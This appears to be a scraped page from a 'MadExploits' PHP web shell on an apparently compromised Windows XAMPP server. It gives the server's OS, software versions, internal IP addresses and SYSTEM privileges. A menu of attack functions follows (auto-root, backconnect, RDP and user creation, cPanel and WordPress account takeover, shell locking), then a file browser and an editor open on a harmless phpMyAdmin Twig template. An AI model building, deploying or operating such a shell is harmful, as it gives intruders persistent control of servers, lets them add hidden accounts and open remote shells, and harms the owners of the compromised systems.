Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
display /
results /
[ HOME SHELL ]
Name
Size
Permission
Action
comment_for_row.twig
531
B
-rw-rw-rw-
data_for_resetting_column_orde...
351
B
-rw-rw-rw-
empty_display.twig
44
B
-rw-rw-rw-
null_display.twig
230
B
-rw-rw-rw-
options_block.twig
4.44
KB
-rw-rw-rw-
page_selector.twig
129
B
-rw-rw-rw-
sort_by_key.twig
354
B
-rw-rw-rw-
table.twig
197
B
-rw-rw-rw-
table_headers.twig
747
B
-rw-rw-rw-
table_navigation.twig
2.82
KB
-rw-rw-rw-
table_navigation_button.twig
605
B
-rw-rw-rw-
value_display.twig
92
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : options_block.twig
<form method="post" action="sql.php" name="displayOptionsForm" class="ajax print_ignore"> {{ get_hidden_inputs({ 'db': db, 'table': table, 'sql_query': sql_query, 'goto': goto, 'display_options_form': 1 }) }} {% include 'div_for_slider_effect.twig' with { 'id': '', 'message': 'Options'|trans, 'initial_sliders_state': default_sliders_state } only %} <fieldset> <div class="formelement"> {# pftext means "partial or full texts" (done to reduce line lengths #} {{ get_radio_fields( 'pftext', { 'P': 'Partial texts'|trans, 'F': 'Full texts'|trans }, pftext, true, true, '', 'pftext_' ~ unique_id ) }} </div> {% if relwork and displaywork %} <div class="formelement"> {{ get_radio_fields( 'relational_display', { 'K': 'Relational key'|trans, 'D': 'Display column for relationships'|trans }, relational_display, true, true, '', 'relational_display_' ~ unique_id ) }} </div> {% endif %} <div class="formelement"> {% include 'checkbox.twig' with { 'html_field_name': 'display_binary', 'label': 'Show binary contents'|trans, 'checked': display_binary is not empty, 'onclick': false, 'html_field_id': 'display_binary_' ~ unique_id } only %} {% include 'checkbox.twig' with { 'html_field_name': 'display_blob', 'label': 'Show BLOB contents'|trans, 'checked': display_blob is not empty, 'onclick': false, 'html_field_id': 'display_blob_' ~ unique_id } only %} </div> {# I would have preferred to name this "display_transformation". This is the only way I found to be able to keep this setting sticky per SQL query, and at the same time have a default that displays the transformations. #} <div class="formelement"> {% include 'checkbox.twig' with { 'html_field_name': 'hide_transformation', 'label': 'Hide browser transformation'|trans, 'checked': hide_transformation is not empty, 'onclick': false, 'html_field_id': 'hide_transformation_' ~ unique_id } only %} </div> {% if possible_as_geometry %} <div class="formelement"> {{ get_radio_fields( 'geoOption', { 'GEOM': 'Geometry'|trans, 'WKT': 'Well Known Text'|trans, 'WKB': 'Well Known Binary'|trans }, geo_option, true, true, '', 'geoOption_' ~ unique_id ) }} </div> {% else %} <div class="formelement"> {{ possible_as_geometry }} {{ get_radio_fields( 'geoOption', { 'WKT': 'Well Known Text'|trans, 'WKB': 'Well Known Binary'|trans }, geo_option, true, true, '', 'geoOption_' ~ unique_id ) }} </div> {% endif %} <div class="clearfloat"></div> </fieldset> <fieldset class="tblFooters"> <input class="btn btn-primary" type="submit" value="{% trans 'Go' %}"> </fieldset> </div>{# slider effect div #} </form>
Close